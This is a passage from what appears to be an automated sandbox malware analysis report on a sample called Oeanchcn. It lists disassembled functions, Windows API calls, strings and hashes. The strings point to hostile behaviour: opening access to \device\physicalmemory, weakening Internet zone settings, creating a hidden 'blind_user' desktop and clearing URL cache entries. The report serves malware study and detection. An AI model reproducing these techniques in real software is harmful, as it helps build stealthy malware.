                            • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Thread$AllocCloseCodeCreateExitHandleLocalObjectSingleWaitmemcpy
                            • String ID:
                            • API String ID: 2845097592-0
                            • Opcode ID: 7ec933356805a86d395f76af41b9b2d9f18e99f1d3eeeb5c371ae48cad7448a7
                            • Instruction ID: 017c82820a2f145177c9e28e2e3f5c0bebc6ad2cdfe5315ab2aa4ad5daf85086
                            • Opcode Fuzzy Hash: 7ec933356805a86d395f76af41b9b2d9f18e99f1d3eeeb5c371ae48cad7448a7
                            • Instruction Fuzzy Hash: 5E31D721A04159BACF01DFA6CC01AAEB7F9AF44318F144476F904E7291E63CDB15C7A9
                            Function 00405F5B Relevance: 13.6, APIs: 9, Instructions: 64stringthreadmemoryCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00405F73
                            • lstrlenA.KERNEL32(?,?), ref: 00405F7E
                            • LocalAlloc.KERNEL32(00000040,?,?,?), ref: 00405F8D
                            • lstrlenA.KERNEL32(?,00000000,?,00000040,?,?,?), ref: 00405FA2
                            • DeleteUrlCacheEntry.WININET(?), ref: 00405FB5
                            • CreateThread.KERNEL32(00000000,00000000,Function_00005C09,00000000,00000000,?), ref: 00405FCA
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040,?,?), ref: 00405FDD
                            • GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040), ref: 00405FE7
                            • CloseHandle.KERNEL32(00000000,00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?), ref: 00405FED
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Thread$AllocCacheCloseCodeCreateDeleteEntryExitHandleLocalObjectSingleWait
                            • String ID:
                            • API String ID: 794401840-0
                            • Opcode ID: 03fc3e79f5e594bfaf1f893bda151e66fa8c5b5e213fcd764589a016d7372ae4
                            • Instruction ID: 5ee1198a60b0fc2a8532ff5616a25e8349e08cf473eab22e95dc85017e90c3ca
                            • Opcode Fuzzy Hash: 03fc3e79f5e594bfaf1f893bda151e66fa8c5b5e213fcd764589a016d7372ae4
                            • Instruction Fuzzy Hash: B011CA71A082447BD701F6668C42EAFB76DDF85368F144476F600B71C2D678AF0147E9
                            Function 0040289A Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 99COMMON
                            Download Yara Rule
                            APIs
                            • GetSecurityInfo.ADVAPI32(?,00000006,?,00000000,00000000,?,00000000,?), ref: 00402976
                            • SetEntriesInAclA.ADVAPI32(00000001,00000002,?,?), ref: 00402988
                            • SetSecurityInfo.ADVAPI32(?,00000006,?,00000000,00000000,?,00000000,?,00000006,?,00000000,00000000,?,00000000,?), ref: 004029A3
                            • CloseHandle.KERNEL32(?,?,00000006,?,00000000,00000000,?,00000000,?,00000006,?,00000000,00000000,?,00000000,?), ref: 004029B1
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
                            Yara matches
                            Similarity
                            • API ID: InfoSecurity$CloseEntriesHandle
                            • String ID: @$CURRENT_USER$\device\physicalmemory
                            • API String ID: 405656561-3357994103
                            • Opcode ID: 3f106b48de9bb5ba9ca254209248b2c107f34978da584956db3145db2ea5644b
                            • Instruction ID: 89d45d45e0a184fa7970b295066ffccd564a705ae1855cc5323f3f658fcd5c06
                            • Opcode Fuzzy Hash: 3f106b48de9bb5ba9ca254209248b2c107f34978da584956db3145db2ea5644b
                            • Instruction Fuzzy Hash: 2A41EB71E4030DAFEB108FD4DC85BEEB7B9FB04319F50403AEA00BA191D7B9595A8B59
                            Function 0040509B Relevance: 12.0, APIs: 1, Strings: 7, Instructions: 43COMMON
                            Download Yara Rule
                            APIs
                            • sprintf.CRTDLL(?,SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u,00000000), ref: 004050CD
                            Strings
                            • yes, xrefs: 0040510E
                            • SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u, xrefs: 004050C1
                            • 1601, xrefs: 004050D4
                            • Software\Microsoft\Windows\CurrentVersion\Internet Settings, xrefs: 004050FF
                            • GlobalUserOffline, xrefs: 004050FA
                            • BrowseNewProcess, xrefs: 00405113
                            • .DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess, xrefs: 00405118
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
                            Yara matches
                            Similarity
                            • API ID: sprintf
                            • String ID: .DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess$1601$BrowseNewProcess$GlobalUserOffline$SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u$Software\Microsoft\Windows\CurrentVersion\Internet Settings$yes
                            • API String ID: 590974362-546450379
                            • Opcode ID: ad57bd7a5e5ee7174c091d0a3ea72984deb32bb5560bbbda773b8a609c7be674
                            • Instruction ID: cd0aaffbc0bd71aa605591c0976343fec0ffbebd6d6d4fedce8ce2f9217411d7
                            • Opcode Fuzzy Hash: ad57bd7a5e5ee7174c091d0a3ea72984deb32bb5560bbbda773b8a609c7be674
                            • Instruction Fuzzy Hash: 24F07DF2F883587EE710A1699C47F8D765907A1704FA400A7BA44B10C2D0FE56C6826D
                            Function 004077E4 Relevance: 10.6, APIs: 7, Instructions: 83windowCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
                            Yara matches
                            Similarity
                            • API ID: Focus$CallProcWindow
                            • String ID:
                            • API String ID: 2401821148-0
                            • Opcode ID: 92e1ce8f7ee7a46a278bda77c005b4e0a5389e500612bd3ca87d360d572643d3
                            • Instruction ID: 67d25c2989ca0d32993d4aa71a0b11dc39683739a3ff9c0c7d6bcfde353c753a
                            • Opcode Fuzzy Hash: 92e1ce8f7ee7a46a278bda77c005b4e0a5389e500612bd3ca87d360d572643d3
                            • Instruction Fuzzy Hash: 6F318233E082149BDF21FB29ED848DA7726A751324715C43AE550B32B1DB787C91CB6E
                            Function 004036B3 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 57fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 004036D7
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 004036F4
                            • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403715
                            • WriteFile.KERNEL32(00000000,0042CC6C,00000002,?,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000), ref: 00403728
                            • CloseHandle.KERNEL32(00000000,00000000,0042CC6C,00000002,?,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?), ref: 00403734
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Write$CloseCreateHandlePointer
                            • String ID: Y&-v
                            • API String ID: 2529654636-852306816
                            • Opcode ID: 1a2ee31b6e64b1819939f0b424d9492dfa5bc2d8a36479f3b8c11624ee1f3d36
                            • Instruction ID: 393fb1fac6dfb6d7043d4134058e676a256c67ba5a84656a07003a75d011006f
                            • Opcode Fuzzy Hash: 1a2ee31b6e64b1819939f0b424d9492dfa5bc2d8a36479f3b8c11624ee1f3d36
                            • Instruction Fuzzy Hash: A401A772B4461439F62165758C43F9E365D8B41B78F208136F711BB1C1D6F97E0142BD
                            Function 00405613 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78COMMON
                            Download Yara Rule
                            APIs
                            • FindFirstUrlCacheEntryA.WININET(*.*,?,00001F40), ref: 00405654
                            • _stricmp.CRTDLL(?,?), ref: 00405679
                            • FindNextUrlCacheEntryA.WININET(00000000,?,00001F40), ref: 004056C0
                            • _stricmp.CRTDLL(?,?), ref: 004056D6
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
                            Yara matches
                            Similarity
                            • API ID: CacheEntryFind_stricmp$FirstNext
                            • String ID: *.*
                            • API String ID: 747601842-438819550
                            • Opcode ID: ba5afd5151c0520d6d715a10c5df759dc41a82144f0bc2f8a3a4ef8e8a54dfaf
                            • Instruction ID: aa6d97de36eacb02400b0bc5d5be45fc0d4f636131057f9c0ab70f2a458f06eb
                            • Opcode Fuzzy Hash: ba5afd5151c0520d6d715a10c5df759dc41a82144f0bc2f8a3a4ef8e8a54dfaf
                            • Instruction Fuzzy Hash: AD21CF72E1005AABCB109A65CC018FBB6EEEB44398F1404F3F108F7290EB799E418F65
                            Function 0040431F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50threadCOMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentThreadId.KERNEL32 ref: 00404341
                            • GetThreadDesktop.USER32(00000000), ref: 00404347
                            • CreateDesktopA.USER32(blind_user,00000000,00000000,00000000,000000C7,00000000), ref: 00404376
                            • SetThreadDesktop.USER32 ref: 00404394
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
                            Yara matches
                            Similarity
                            • API ID: DesktopThread$CreateCurrent
                            • String ID: blind_user
                            • API String ID: 2384851093-487808672
                            • Opcode ID: f5dbc74db38e7769b0145d7bd92762358955ae931e1e69e9e23be6df9a4e239d
                            • Instruction ID: 282a6fb7077f79b337956a50597d570250b08ff90f4541f666399335e01d3b83
                            • Opcode Fuzzy Hash: f5dbc74db38e7769b0145d7bd92762358955ae931e1e69e9e23be6df9a4e239d
                            • Instruction Fuzzy Hash: 2C018471B442006FDB14B73E9C5276FA6D95BC0314F64403BA602F72D0E9B899018A5D
                            Function 00403840 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
                            Yara matches
                            Similarity
                            • API ID: printf
                            • String ID: %02X $HEX:
                            • API String ID: 3524737521-2568639716
                            • Opcode ID: 20ec43f9d3281b237926bfbb5e092365326a766f922892e0b88cafedccc6c182
                            • Instruction ID: 8eff4c8c66366255d0771bcdb7d8d21a427f9234d78b176c67630138abebef86
                            • Opcode Fuzzy Hash: 20ec43f9d3281b237926bfbb5e092365326a766f922892e0b88cafedccc6c182
                            • Instruction Fuzzy Hash: 43F0E972F05214BBD704DB9ADC4286E77A9DB9236473080FBF804631C0E9755F0086A9
                            Function 00403BBE Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 112COMMON
                            Download Yara Rule
                            APIs
                            • memset.CRTDLL(?,00000090,00000008,56CC39D8,-0042AA50,297D09F2,00000000), ref: 00403C8B
                            • memcpy.CRTDLL(?,-0042AA50,00000000,?,00000090,00000008,56CC39D8,-0042AA50,297D09F2,00000000), ref: 00403CAE
                            • memcpy.CRTDLL(-0042AA50,?,00000006,?,-0042AA50,00000000,?,00000090,00000008,56CC39D8,-0042AA50,297D09F2,00000000), ref: 00403CBE
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
                            Yara matches
                            Similarity
                            • API ID: memcpy$memset
                            • String ID: MC
                            • API String ID: 438689982-3957011357
                            • Opcode ID: 17c6be56fc60e202b714f164ab6214ad707b693cbc1fda5e6d8626b4e57840bc
                            • Instruction ID: 0fabd55d67194886af3b95eda558b9f651b3b184c5d0290ca09bafd6d30b71fa
                            • Opcode Fuzzy Hash: 17c6be56fc60e202b714f164ab6214ad707b693cbc1fda5e6d8626b4e57840bc
                            • Instruction Fuzzy Hash: F131B661F08198AFDB00DFBDC84169EBFFA9B4A210F1480B6E884F7381D5789F059765
                            Function 004017AC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68comCOMMON
                            Download Yara Rule
                            APIs
                            • CoInitialize.OLE32(00000000), ref: 004017CC
                            • CLSIDFromString.OLE32({9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 004017DA
                            • CoCreateInstance.OLE32(?,00000000,?,0042CD50,?,{9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 00401803
                            Strings
                            • {9BA05972-F6A8-11CF-A442-00A0C90A8F39}, xrefs: 004017D5
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateFromInitializeInstanceString
                            • String ID: {9BA05972-F6A8-11CF-A442-00A0C90A8F39}
                            • API String ID: 1245325315-1222218007
                            • Opcode ID: 374fb238f9a8af98a0c272c884aa5e7a000c0b0753857630dac3c0af84d03f4f
                            • Instruction ID: 52c0c8d8f8a1b88d6522b4dea913535513547713cd70a2aa0dd21656c7656eb5
                            • Opcode Fuzzy Hash: 374fb238f9a8af98a0c272c884aa5e7a000c0b0753857630dac3c0af84d03f4f
                            • Instruction Fuzzy Hash: E1118673B102116FE710FEF5DC81BAB7AE89B00355F10483BE644F32D1E6B8A50286B9
                            Function 0040109B Relevance: 6.1, APIs: 4, Instructions: 122COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
                            Yara matches
                            Similarity
                            • API ID: signal$raise
                            • String ID:
                            • API String ID: 372037113-0
                            • Opcode ID: 2d1ef5de37ea69ebb4b8d4bb24db1da757c13c860f6842aad27d4f5ac914ae12
                            • Instruction ID: baa5ba32779064c34a5af0890878b5a2dbb5619b613b0807c362cc876063d63b
                            • Opcode Fuzzy Hash: 2d1ef5de37ea69ebb4b8d4bb24db1da757c13c860f6842aad27d4f5ac914ae12
                            • Instruction Fuzzy Hash: 4541B475A01204DFC720DF18EC84B5677B4FB08350F44457AEE14AB3E1E734A965CBAA
                            Function 0040447A Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68memorystringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00404492
                            • LocalAlloc.KERNEL32(00000040,-00000008,?), ref: 004044A4
                            • sprintf.CRTDLL(?,%s%c%c,?,4EC4EBEE,?,00000040,-00000008,?), ref: 00404515
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocLocallstrlensprintf
                            • String ID: %s%c%c
                            • API String ID: 2176257816-3118753097
                            • Opcode ID: 3bea807363c46ff2eeabd7410228c447bcb65eafde6f1461acbb5ea9ba8cf64b
                            • Instruction ID: 40b1eb1d73d9c04af9a72cf5af1a140bd4a75b2e1492408562adfdfa8721cd8f
                            • Opcode Fuzzy Hash: 3bea807363c46ff2eeabd7410228c447bcb65eafde6f1461acbb5ea9ba8cf64b
                            • Instruction Fuzzy Hash: F9110B72E0406867DB009A9A88815AFFBB69FC5310F1641F7EA04B73C1D27CAD0193A5
                            Function 0040421F Relevance: 6.0, APIs: 4, Instructions: 49registryCOMMON
                            Download Yara Rule
                            APIs
                            • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,00020006,00000000,?,?,4FB14922), ref: 00404255
                            • RegSetValueExA.ADVAPI32(?,4FB14922,00000000,00000000,?,?,?,?,00000000,00000000,00000000,00020006,00000000,?,?,4FB14922), ref: 00404273
                            • RegCloseKey.ADVAPI32(?,?,4FB14922,00000000,00000000,?,?,?,?,00000000,00000000,00000000,00020006,00000000,?,?), ref: 0040427F
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCreateValue
                            • String ID:
                            • API String ID: 1818849710-0
                            • Opcode ID: 65498cc65565106dc5b66ff6a4b4d842dc0e77ec129b82882a45272a282f6444
                            • Instruction ID: d96ef7c4080a9b633a5bca21bfcbc2c766a155132064e5ed691f16c3214ccdec
                            • Opcode Fuzzy Hash: 65498cc65565106dc5b66ff6a4b4d842dc0e77ec129b82882a45272a282f6444
                            • Instruction Fuzzy Hash: B801F772B10109BBCF11AEB5CC02F9EBEBA9F84340F240476B704F61E0D675D9116718
                            Function 0040429C Relevance: 6.0, APIs: 4, Instructions: 47registryCOMMON
                            Download Yara Rule
                            APIs
                            • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004042D3
                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00020019,?), ref: 004042EF
                            • RegCloseKey.ADVAPI32(?,?,?,00000000,00000000,?,?,?,?,00000000,00020019,?), ref: 004042FB
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseOpenQueryValue
                            • String ID:
                            • API String ID: 3677997916-0
                            • Opcode ID: 357a631b938b58c4fbb87905ba1aa3de6a3adf1b78dd9d8722630d207e2470c7
                            • Instruction ID: 691f158720e2b36127ee9bd81ba90e70b5a5535aabeb9bf87ba7554e5ddc9d88
                            • Opcode Fuzzy Hash: 357a631b938b58c4fbb87905ba1aa3de6a3adf1b78dd9d8722630d207e2470c7
                            • Instruction Fuzzy Hash: 9801F271B1410ABACF109E25CC02BEEBFA99F94390F140472BE04F61E1D374EE11A3A9
                            Function 00403743 Relevance: 6.0, APIs: 4, Instructions: 43fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403769
